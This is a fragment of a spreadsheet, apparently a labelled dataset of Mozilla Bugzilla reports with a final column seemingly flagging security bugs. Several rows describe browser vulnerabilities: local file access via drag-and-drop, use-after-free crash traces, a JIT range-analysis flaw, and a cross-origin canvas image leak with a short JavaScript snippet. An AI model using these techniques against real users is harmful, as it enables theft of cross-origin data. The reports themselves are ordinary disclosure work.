          <t>Hook up the send button to open the current URL in another browser.</t>
        </is>
      </c>
      <c r="X241" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="242">
      <c r="A242" t="n">
        <v>1376115</v>
      </c>
      <c r="B242" t="inlineStr">
        <is>
          <t>2017-06-24 08:54:59 -0700</t>
        </is>
      </c>
      <c r="C242" t="inlineStr">
        <is>
          <t>Increase size of awesomebar results in touch mode</t>
        </is>
      </c>
      <c r="D242" t="inlineStr">
        <is>
          <t>2018-12-07 13:37:34 -0800</t>
        </is>
      </c>
      <c r="E242" t="n">
        <v>1</v>
      </c>
      <c r="F242" t="n">
        <v>1</v>
      </c>
      <c r="G242" t="n">
        <v>2</v>
      </c>
      <c r="H242" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I242" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J242" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K242" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L242" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M242" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N242" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O242" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P242" t="inlineStr">
        <is>
          <t>[reserve-photon-visual][p2]</t>
        </is>
      </c>
      <c r="Q242" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R242" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S242" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T242" t="n">
        <v>1</v>
      </c>
      <c r="U242" t="n">
        <v>1</v>
      </c>
      <c r="V242" t="n">
        <v>6</v>
      </c>
      <c r="W242" t="inlineStr">
        <is>
          <t>From bug 1256754 comment 18:
&gt; Thank you so much for doing this! I use Firefox on a SP4 everyday and you
&gt; might not realize how much this has improved things! Please do the same to
&gt; URL bar suggestions! URL bar suggestions are too close together for touch
&gt; screen use and I frequently tap the wrong suggestion :(</t>
        </is>
      </c>
      <c r="X242" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="243">
      <c r="A243" t="n">
        <v>1424107</v>
      </c>
      <c r="B243" t="inlineStr">
        <is>
          <t>2017-12-07 17:48:52 -0800</t>
        </is>
      </c>
      <c r="C243" t="inlineStr">
        <is>
          <t>Drag and dropping file: URL into new tab with rel=noopener allows opening locally stored files</t>
        </is>
      </c>
      <c r="D243" t="inlineStr">
        <is>
          <t>2019-01-04 09:33:29 -0800</t>
        </is>
      </c>
      <c r="E243" t="n">
        <v>1</v>
      </c>
      <c r="F243" t="n">
        <v>1</v>
      </c>
      <c r="G243" t="n">
        <v>3</v>
      </c>
      <c r="H243" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I243" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J243" t="inlineStr">
        <is>
          <t>DOM: Copy &amp; Paste and Drag &amp; Drop</t>
        </is>
      </c>
      <c r="K243" t="inlineStr">
        <is>
          <t>58 Branch</t>
        </is>
      </c>
      <c r="L243" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M243" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N243" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O243" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P243" t="inlineStr">
        <is>
          <t>[adv-main60+]</t>
        </is>
      </c>
      <c r="Q243" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R243" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S243" t="inlineStr">
        <is>
          <t>mozilla60</t>
        </is>
      </c>
      <c r="T243" t="n">
        <v>1</v>
      </c>
      <c r="U243" t="n">
        <v>0</v>
      </c>
      <c r="V243" t="n">
        <v>27</v>
      </c>
      <c r="W243" t="inlineStr">
        <is>
          <t>Created attachment 8935592
qw.html
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36
Steps to reproduce:
Tested latest nightly. Open attached PoC and follow steps.
Actual results:
We can drag and drop a file url link into a rel=noopener tab and we will end up loading local files.
Video(unlisted): https://www.youtube.com/watch?v=W2KHyfS6_7I
Expected results:
Similar to Bug 1379842, this should not be allowed. 
An argument could be made that this is intentional because you can drag and drop anchor tags from other browsers into a mozilla tab and it will open. Or drag and drop a file bookmark works. 
But I think its best not to allow links coming from normal web content to do this, one suggestion is to somehow detect dragged objects that contain file:// url that the window/document its dragged from has no access to and change this dragged objects values from the file:// url to about:blank.
According to logs, the following error occurs:
Security Error: Content at http://localhost/qw.html may not load or link to ...
I think whatever function throws this error could also change the url dragged as well as i suggested above.</t>
        </is>
      </c>
      <c r="X243" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="244">
      <c r="A244" t="n">
        <v>774597</v>
      </c>
      <c r="B244" t="inlineStr">
        <is>
          <t>2012-07-17 01:37:46 -0700</t>
        </is>
      </c>
      <c r="C244" t="inlineStr">
        <is>
          <t>Heap-use-after-free in MediaStreamGraphThreadRunnable::Run()</t>
        </is>
      </c>
      <c r="D244" t="inlineStr">
        <is>
          <t>2024-05-29 16:02:42 -0700</t>
        </is>
      </c>
      <c r="E244" t="n">
        <v>1</v>
      </c>
      <c r="F244" t="n">
        <v>1</v>
      </c>
      <c r="G244" t="n">
        <v>3</v>
      </c>
      <c r="H244" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I244" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J244" t="inlineStr">
        <is>
          <t>Audio/Video</t>
        </is>
      </c>
      <c r="K244" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L244" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M244" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N244" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O244" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P244" t="inlineStr">
        <is>
          <t>[asan][advisory-tracking+][qa-]</t>
        </is>
      </c>
      <c r="Q244" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R244" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S244" t="inlineStr">
        <is>
          <t>mozilla17</t>
        </is>
      </c>
      <c r="T244" t="n">
        <v>1</v>
      </c>
      <c r="U244" t="n">
        <v>0</v>
      </c>
      <c r="V244" t="n">
        <v>14</v>
      </c>
      <c r="W244" t="inlineStr">
        <is>
          <t>Reproduces on trunk, but no reliable testcase. Looks like a race condition, free and read stacks on different threads.
=================================================================
==23547== ERROR: AddressSanitizer heap-use-after-free on address 0x7f0a6bff8e98 at pc 0x7f0a97af44c9 bp 0x7f0a66fda690 sp 0x7f0a66fda688
READ of size 8 at 0x7f0a6bff8e98 thread T26
    #0 0x7f0a97af44c9 in nsTArray_base&lt;nsTArrayDefaultAllocator&gt;::Length() const ../../dist/include/nsTArray.h:192
    #1 0x7f0a97b000ba in mozilla::(anonymous namespace)::MediaStreamGraphThreadRunnable::Run() content/media/MediaStreamGraph.cpp:1418
    #2 0x7f0a9901cc64 in NS_ProcessNextEvent_P(nsIThread*, bool) obj-firefox/xpcom/build/nsThreadUtils.cpp:217
    #3 0x7f0a990de3ed in nsThread::ShuttingDown() xpcom/threads/nsThread.h:58
    #4 0x7f0a9daf489f in _pt_root nsprpub/pr/src/pthreads/ptthread.c:159
    #5 0x42795c in __asan::AsanThread::ThreadStart() 
0x7f0a6bff8e98 is located 24 bytes inside of 160-byte region [0x7f0a6bff8e80,0x7f0a6bff8f20)
freed by thread T0 here:
    #0 0x4248b2 in free 
    #1 0x7f0a97b0019d in mozilla::(anonymous namespace)::MediaStreamGraphShutDownRunnable::Run() ../../dist/include/mozilla/mozalloc.h:224
    #2 0x7f0a9901cc64 in NS_ProcessNextEvent_P(nsIThread*, bool) obj-firefox/xpcom/build/nsThreadUtils.cpp:217
    #3 0x7f0a98d1b0d8 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:82
    #4 0x7f0a99164b9c in ~AutoRunState ipc/chromium/src/base/message_loop.cc:495
    #5 0x7f0a98a49fce in nsBaseAppShell::Run() widget/xpwidgets/nsBaseAppShell.cpp:165
    #6 0x7f0a95f13410 in XREMain::XRE_main(int, char**, nsXREAppData const*) toolkit/xre/nsAppRunner.cpp:3864
    #7 0x7f0a95f144ab in XRE_main toolkit/xre/nsAppRunner.cpp:3940
    #8 0x408d26 in do_main(int, char**) browser/app/nsBrowserApp.cpp:160
    #9 0x7f0a9e942c4d in __libc_start_main /build/buildd/eglibc-2.11.1/csu/libc-start.c:258
previously allocated by thread T0 here:
    #0 0x424972 in __interceptor_malloc 
    #1 0x7f0a9be211a9 in moz_xmalloc memory/mozalloc/mozalloc.cpp:54
Thread T26 created by T0 here:
    #0 0x4204b5 in pthread_create 
    #1 0x7f0a9daf08af in _PR_CreateThread nsprpub/pr/src/pthreads/ptthread.c:393
    #2 0x7f0a9daf0308 in PR_CreateThread nsprpub/pr/src/pthreads/ptthread.c:476
==23547== ABORTING
Stats: 224M malloced (246M for red zones) by 555057 calls
Stats: 63M realloced by 26859 calls
Stats: 192M freed by 304029 calls
Stats: 56M really freed by 87570 calls
Stats: 452M (115781 full pages) mmaped in 113 calls
  mmaps   by size class: 8:409575; 9:57337; 10:20475; 11:14329; 12:5120; 13:3584; 14:1792; 15:384; 16:704; 17:128; 18:352; 19:48; 20:16;
  mallocs by size class: 8:448948; 9:58529; 10:19258; 11:15813; 12:5297; 13:3626; 14:1808; 15:460; 16:754; 17:148; 18:356; 19:46; 20:14;
  frees   by size class: 8:221668; 9:43579; 10:15245; 11:12709; 12:4297; 13:3356; 14:1570; 15:403; 16:678; 17:129; 18:341; 19:42; 20:12;
  rfrees  by size class: 8:59999; 9:12785; 10:4920; 11:6721; 12:899; 13:593; 14:1049; 15:151; 16:365; 17:44; 18:27; 19:16; 20:1;
Stats: malloc large: 564 small slow: 2703
Shadow byte and word:
  0x1fe14d7ff1d3: fd
  0x1fe14d7ff1d0: fd fd fd fd fd fd fd fd
More shadow bytes:
  0x1fe14d7ff1b0: fa fa fa fa fa fa fa fa
  0x1fe14d7ff1b8: fa fa fa fa fa fa fa fa
  0x1fe14d7ff1c0: fa fa fa fa fa fa fa fa
  0x1fe14d7ff1c8: fa fa fa fa fa fa fa fa
=&gt;0x1fe14d7ff1d0: fd fd fd fd fd fd fd fd
  0x1fe14d7ff1d8: fd fd fd fd fd fd fd fd
  0x1fe14d7ff1e0: fd fd fd fd fd fd fd fd
  0x1fe14d7ff1e8: fd fd fd fd fd fd fd fd
  0x1fe14d7ff1f0: fa fa fa fa fa fa fa fa</t>
        </is>
      </c>
      <c r="X244" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="245">
      <c r="A245" t="n">
        <v>1776755</v>
      </c>
      <c r="B245" t="inlineStr">
        <is>
          <t>2022-06-27 12:46:35 -0700</t>
        </is>
      </c>
      <c r="C245" t="inlineStr">
        <is>
          <t>Logic depending on ExpandedPrincipal ordering in `Document::MaybeDowngradePrincipal` is broken</t>
        </is>
      </c>
      <c r="D245" t="inlineStr">
        <is>
          <t>2023-10-17 20:49:23 -0700</t>
        </is>
      </c>
      <c r="E245" t="n">
        <v>1</v>
      </c>
      <c r="F245" t="n">
        <v>1</v>
      </c>
      <c r="G245" t="n">
        <v>3</v>
      </c>
      <c r="H245" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I245" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J245" t="inlineStr">
        <is>
          <t>Security: CAPS</t>
        </is>
      </c>
      <c r="K245" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L245" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M245" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N245" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O245" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P245" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main113+]</t>
        </is>
      </c>
      <c r="Q245" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R245" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S245" t="inlineStr">
        <is>
          <t>113 Branch</t>
        </is>
      </c>
      <c r="T245" t="n">
        <v>1</v>
      </c>
      <c r="U245" t="n">
        <v>0</v>
      </c>
      <c r="V245" t="n">
        <v>16</v>
      </c>
      <c r="W245" t="inlineStr">
        <is>
          <t>In `Document::MaybeDowngradePrincipal` there is logic which tries to determine properties of an expanded principal coming from a webextension content script by assuming the order of the principals in the allowList (https://searchfox.org/mozilla-central/rev/5b2d2863bd315f232a3f769f76e0eb16cdca7cb0/dom/base/Document.cpp#3016-3027). This is done under the assumption that because when the extension code creates a content script principal it always passed the content page's script before the extension's principal, it will always appear first.
Unfortunately, this is not correct. The order of principals in an expanded principal is actually determined by their origin's alphabetical order, as they are sorted when they are added to the `ExpandedPrincipal` (https://searchfox.org/mozilla-central/rev/5b2d2863bd315f232a3f769f76e0eb16cdca7cb0/caps/ExpandedPrincipal.cpp#56-63). This logic only works because the scheme `http[s]://` orders lower than the scheme `moz-extension://` when sorting, so it ends up appearing first. I worry that we may already have issues in this case for documents with a null principal, as `moz-nullprincipal` orders after `moz-extension`.
The logic in `ExpandedPrincipal::PrincipalToInherit` may also need to be updated, as it falls back to using `mPrincipals.LastElement()` in some cases, which is probably not what we want given that it's based on the alphabetical order of the principals passed in: https://searchfox.org/mozilla-central/rev/5b2d2863bd315f232a3f769f76e0eb16cdca7cb0/caps/ExpandedPrincipal.cpp#196. There's a similar situation with `IsThirdPartyURI` which falls back to the first principal: https://searchfox.org/mozilla-central/rev/5b2d2863bd315f232a3f769f76e0eb16cdca7cb0/caps/ExpandedPrincipal.cpp#381. 
Alternatively, we could also consider removing the sorting from `ExpandedPrincipal`.</t>
        </is>
      </c>
      <c r="X245" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="246">
      <c r="A246" t="n">
        <v>1540221</v>
      </c>
      <c r="B246" t="inlineStr">
        <is>
          <t>2019-03-29 12:07:48 -0700</t>
        </is>
      </c>
      <c r="C246" t="inlineStr">
        <is>
          <t>Security: Cross-origin theft of images in fillText and CanvasPattern</t>
        </is>
      </c>
      <c r="D246" t="inlineStr">
        <is>
          <t>2024-05-30 09:57:52 -0700</t>
        </is>
      </c>
      <c r="E246" t="n">
        <v>1</v>
      </c>
      <c r="F246" t="n">
        <v>1</v>
      </c>
      <c r="G246" t="n">
        <v>3</v>
      </c>
      <c r="H246" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I246" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J246" t="inlineStr">
        <is>
          <t>Graphics: Canvas2D</t>
        </is>
      </c>
      <c r="K246" t="inlineStr">
        <is>
          <t>68 Branch</t>
        </is>
      </c>
      <c r="L246" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M246" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N246" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O246" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P246" t="inlineStr">
        <is>
          <t>[adv-main67+][adv-esr60.7+]</t>
        </is>
      </c>
      <c r="Q246" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R246" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S246" t="inlineStr">
        <is>
          <t>mozilla68</t>
        </is>
      </c>
      <c r="T246" t="n">
        <v>1</v>
      </c>
      <c r="U246" t="n">
        <v>0</v>
      </c>
      <c r="V246" t="n">
        <v>40</v>
      </c>
      <c r="W246" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
Steps to reproduce:
1. Navigate to https://cyberjutsu.io/files/cross_origin_fillText.html
2. You can see the Google logo has been stolen, then print it out as the textarea value
Tested on latest Stable &amp;&amp; Nightly (Windows 10)
Actual results:
At https://dxr.mozilla.org/mozilla-central/source/dom/canvas/CanvasRenderingContext2D.cpp?redirect_type=single#3527
```
      if (state-&gt;gradientStyles[style]) {  // Gradient
        pattern = GetGradientFor(style);
      } else if (state-&gt;patternStyles[style]) {  // Pattern
        pattern = GetPatternFor(style); 
      } else {
        MOZ_ASSERT(false, "Should never reach here.");
        return;
      }
      MOZ_ASSERT(pattern, "No valid pattern.");
      if (style == Style::FILL) {
        params.context-&gt;SetPattern(pattern);
      } else {
        params.textStrokePattern = pattern;
      }
```
it's possible to draw a canvaspattern (which can be loaded with an image) as background of a text.
Due to lacking of checking mWriteonly/Principal/CORs later on, we can extract the whole canvas by calling .toDataURL() for example.
```
    ctx.font = "10000px Arial"; // &lt;-- make the dot "." to big, to leak the whole image. we can fix it dynamically depends on image's size.
    ctx.fillStyle = pattern; 
    ctx.fillText(".", 0, 200);
```
Expected results:
canvas.toDataURL() should not be invoked successfully due to invalid CORs.</t>
        </is>
      </c>
      <c r="X246" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="247">
      <c r="A247" t="n">
        <v>1436117</v>
      </c>
      <c r="B247" t="inlineStr">
        <is>
          <t>2018-02-06 10:32:11 -0800</t>
        </is>
      </c>
      <c r="C247" t="inlineStr">
        <is>
          <t>A WrappedI420Buffer in MediaPipeline might outlive its buffer</t>
        </is>
      </c>
      <c r="D247" t="inlineStr">
        <is>
          <t>2022-03-17 14:49:12 -0700</t>
        </is>
      </c>
      <c r="E247" t="n">
        <v>1</v>
      </c>
      <c r="F247" t="n">
        <v>1</v>
      </c>
      <c r="G247" t="n">
        <v>3</v>
      </c>
      <c r="H247" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I247" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J247" t="inlineStr">
        <is>
          <t>WebRTC: Audio/Video</t>
        </is>
      </c>
      <c r="K247" t="inlineStr">
        <is>
          <t>60 Branch</t>
        </is>
      </c>
      <c r="L247" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M247" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N247" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O247" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P247" t="inlineStr"/>
      <c r="Q247" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R247" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S247" t="inlineStr">
        <is>
          <t>mozilla60</t>
        </is>
      </c>
      <c r="T247" t="n">
        <v>1</v>
      </c>
      <c r="U247" t="n">
        <v>0</v>
      </c>
      <c r="V247" t="n">
        <v>9</v>
      </c>
      <c r="W247" t="inlineStr">
        <is>
          <t>One use of a WrappedI420Buffer in MediaPipeline [1] gets passed on further into the stack, but nothing keeps the PlanarYCbCrImage that owns the actual pixel buffer alive.
The WrappedI420Buffer outliving the PlanarYCbCrImage would be bad, but I hope and think we only end up reading that data as an image in a webrtc encoder and not doing any writing.
[1] https://searchfox.org/mozilla-central/rev/f80722d4f3bfb722c5ec53880c4a7efb71285676/media/webrtc/signaling/src/mediapipeline/MediaPipeline.cpp#345-356</t>
        </is>
      </c>
      <c r="X247" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="248">
      <c r="A248" t="n">
        <v>1405604</v>
      </c>
      <c r="B248" t="inlineStr">
        <is>
          <t>2017-10-04 02:32:58 -0700</t>
        </is>
      </c>
      <c r="C248" t="inlineStr">
        <is>
          <t>[Regression] The clipboard is incorrectly cleared after following specific steps</t>
        </is>
      </c>
      <c r="D248" t="inlineStr">
        <is>
          <t>2017-10-30 05:15:26 -0700</t>
        </is>
      </c>
      <c r="E248" t="n">
        <v>1</v>
      </c>
      <c r="F248" t="n">
        <v>1</v>
      </c>
      <c r="G248" t="n">
        <v>2</v>
      </c>
      <c r="H248" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I248" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J248" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K248" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L248" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M248" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N248" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O248" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P248" t="inlineStr">
        <is>
          <t>[Regression]</t>
        </is>
      </c>
      <c r="Q248" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R248" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S248" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T248" t="n">
        <v>1</v>
      </c>
      <c r="U248" t="n">
        <v>0</v>
      </c>
      <c r="V248" t="n">
        <v>8</v>
      </c>
      <c r="W248" t="inlineStr">
        <is>
          <t>Build: 21b363679
Device: iPhone 6S
iOS: 10.3.3
Steps to reproduce:
1. Go to Settings and turn Offer to Go to Copied link On
2. Open a new tab and go to youtube.com
3. Long tap on the URL bar and copy the link
4. Double tap on Home button and close Firefox
5. Re-open Firefox
6. Background Firefox by pressing the home button once
Actual results:
- The clipboard is cleared. This can be seen in the Today Widget or by trying to paste the previous copied link in the URL bar.
Expected results:
- The clipboard should not be cleared.
Note:
- Issue reproducible on both iOS 11.x and iOS 10.x
See video here:
- https://www.youtube.com/watch?v=xh4o8UY9azk</t>
        </is>
      </c>
      <c r="X248" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="249">
      <c r="A249" t="n">
        <v>1528829</v>
      </c>
      <c r="B249" t="inlineStr">
        <is>
          <t>2019-02-18 12:41:37 -0800</t>
        </is>
      </c>
      <c r="C249" t="inlineStr">
        <is>
          <t>Arbitrary range mis-inference due to loop phi range analysis disregarding overflows/truncation</t>
        </is>
      </c>
      <c r="D249" t="inlineStr">
        <is>
          <t>2024-05-30 09:56:41 -0700</t>
        </is>
      </c>
      <c r="E249" t="n">
        <v>1</v>
      </c>
      <c r="F249" t="n">
        <v>1</v>
      </c>
      <c r="G249" t="n">
        <v>3</v>
      </c>
      <c r="H249" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I249" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J249" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K249" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L249" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M249" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N249" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O249" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P249" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][jsbugmon:update,testComment=2,origRev=dd4aa59c6a12][post-critsmash-triage][adv-main66+][adv-esr60.6+]</t>
        </is>
      </c>
      <c r="Q249" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R249" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S249" t="inlineStr">
        <is>
          <t>mozilla67</t>
        </is>
      </c>
      <c r="T249" t="n">
        <v>1</v>
      </c>
      <c r="U249" t="n">
        <v>1</v>
      </c>
      <c r="V249" t="n">
        <v>27</v>
      </c>
      <c r="W249" t="inlineStr">
        <is>
          <t>Created attachment 9044718
writeup.md
The bug exists in the current release and mozilla-central branches of the Spidermonkey engine included in Firefox. It exists on all platforms.
The issue lets an attacker produce an arbitrary value in compiled JavaScript code, for which the range analysis will infer a fully controlled, incorrect range. For a detailed analysis of the issue and its exploitability, along with reproducing code samples, please refer to the attached writeup.md file.</t>
        </is>
      </c>
      <c r="X249" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="250">
      <c r="A250" t="n">
        <v>1212822</v>
      </c>
      <c r="B250" t="inlineStr">
        <is>
          <t>2015-10-08 05:00:07 -0700</t>
        </is>
      </c>
      <c r="C250" t="inlineStr">
        <is>
          <t>Stop using local.py other than for development</t>
        </is>
      </c>
      <c r="D250" t="inlineStr">
        <is>
          <t>2015-12-21 07:12:23 -0800</t>
        </is>
      </c>
      <c r="E250" t="n">
        <v>1</v>
      </c>
      <c r="F250" t="n">
        <v>1</v>
      </c>
      <c r="G250" t="n">
        <v>7</v>
      </c>
      <c r="H250" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I250" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J250" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K250" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L250" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M250" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N250" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O250" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P250" t="inlineStr"/>
      <c r="Q250" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R250" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S250" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T250" t="n">
        <v>1</v>
      </c>
      <c r="U250" t="n">
        <v>0</v>
      </c>
      <c r="V250" t="n">
        <v>3</v>
      </c>
      <c r="W250" t="inlineStr">
        <is>
          <t>I'm splitting this out of bug 1197186.
Let's stick the local.py import under a `if DEBUG:` or `if VAGRANT:` since we shouldn't be using it for anything other than local development.</t>
        </is>
      </c>
      <c r="X250" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="251">
      <c r="A251" t="n">
        <v>1193999</v>
      </c>
      <c r="B251" t="inlineStr">
        <is>
          <t>2015-08-12 15:33:07 -0700</t>
        </is>
      </c>
      <c r="C251" t="inlineStr">
        <is>
          <t>Crash [@ graphite2::TtfUtil::CheckTable]</t>
        </is>
      </c>
      <c r="D251" t="inlineStr">
        <is>
          <t>2016-07-02 11:18:22 -0700</t>
        </is>
      </c>
      <c r="E251" t="n">
        <v>1</v>
      </c>
      <c r="F251" t="n">
        <v>1</v>
      </c>
      <c r="G251" t="n">
        <v>3</v>
      </c>
      <c r="H251" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I251" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J251" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K251" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L251" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M251" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N251" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O251" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P251" t="inlineStr">
        <is>
          <t>sec-high+ without OTS [gfx-noted][adv-main43+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q251" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R251" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S251" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T251" t="n">
        <v>1</v>
      </c>
      <c r="U251" t="n">
        <v>0</v>
      </c>
      <c r="V251" t="n">
        <v>5</v>
      </c>
      <c r="W251" t="inlineStr">
        <is>
          <t>The attached testcase crashes on graphite2 revision fa8d4398dded (run through the gr2fonttest command line utility).
Backtrace:
==1667==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000efd0 at pc 0x7fe96c758c78 bp 0x7fff75154680 sp 0x7fff75154678
READ of size 4 at 0x60200000efd0 thread T0
    #0 0x7fe96c758c77 in graphite2::TtfUtil::CheckTable(graphite2::TtfUtil::Tag, void const*, unsigned long) /src/TtfUtil.cpp:273:18
